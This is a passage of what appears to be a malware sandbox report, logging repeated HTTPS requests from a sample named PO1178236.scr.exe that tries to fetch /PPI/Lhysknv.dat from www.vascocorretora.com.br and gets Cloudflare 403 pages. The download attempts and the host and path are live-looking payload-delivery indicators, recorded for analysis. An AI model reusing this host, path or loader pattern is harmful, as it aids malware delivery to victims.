6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1d83d604299</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:35 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 64 38 33 64 36 30 34 32 39 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1d83d604299',t:'MTczNjQwODE5NS4wMDAwMDA='}
        2025-01-09 07:36:35 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        64192.168.2.949772188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:36 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:36 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:36 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:51 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bcXqv3ZyV3dlr3juN2%2BqCaMVDe8zRKvEivMNn7W5X9PDHPAk%2FoG0EHkR4Fo7aQW5Ia%2BiWv0cPyCQCmb2xosIdfnRSCFUmnwbR3mFjsR1lIRN4UYSfK5NPf9ZYHPENBJmsrK9JMRG8%2BtrSmDq"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1dbeb4843f7-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1557&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1811414&cwnd=213&unsent_bytes=0&cid=349b12b47c9c152d&ts=134&x=0"
        2025-01-09 07:36:36 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:36 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:36 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:36 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 64 62 65 62 34 38 34 33 66 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1dbeb4843f7</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:36 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 64 62 65 62 34 38 34 33 66 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1dbeb4843f7',t:'MTczNjQwODE5Ni4wMDAwMDA='};var
        2025-01-09 07:36:36 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        65192.168.2.949773188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:37 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:37 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:52 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E0pwhwXiPUVPE0hygfxX8d0lFKQK2jMOmrEbUtG%2Fnerg3Muiojdbx5%2BKYXXA1XsP9wyWQdIpNXTIT%2BJxTtlwOJoVXA4peNPg7AAK5n2jkcAjvQqUmwaK%2FISPrc%2BNvoxhXI9wH0jSuaPfPVAT"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1dfbd484252-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2214&min_rtt=2197&rtt_var=859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1248930&cwnd=235&unsent_bytes=0&cid=f93b64e0830bdbb9&ts=144&x=0"
        2025-01-09 07:36:37 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:37 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:37 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:37 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 64 66 62 64 34 38 34 32 35 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1dfbd484252</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:37 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 64 66 62 64 34 38 34 32 35 32 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1dfbd484252',t:'MTczNjQwODE5Ny4wMDAwMDA='};v
        2025-01-09 07:36:37 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        66192.168.2.949774188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:37 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:37 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:52 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9yj%2FX4asUQ8F14i%2BTleiMs5W4PNiCr7hfqhOI9DN5NYhN7F08aZdDn4UhbVxdf2AZMOa4740V6hgXTruJ%2F9BiLLDNNa6MYhvfLHAx%2BkHf4cdKLn%2FuiJQTWC4CMStWWWA6Gb2vs0ooTo3374p"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1e3a980c466-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1791411&cwnd=219&unsent_bytes=0&cid=4f3793f1bbd91e9d&ts=146&x=0"
        2025-01-09 07:36:37 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:37 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:37 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:37 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 65 33 61 39 38 30 63 34 36 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1e3a980c466</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:37 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 65 33 61 39 38 30 63 34 36 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1e3a980c466',t:'MTczNjQwODE5Ny4wMDAwMDA='};v
        2025-01-09 07:36:37 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        67192.168.2.949775188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:38 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:38 UTC1015INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:38 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
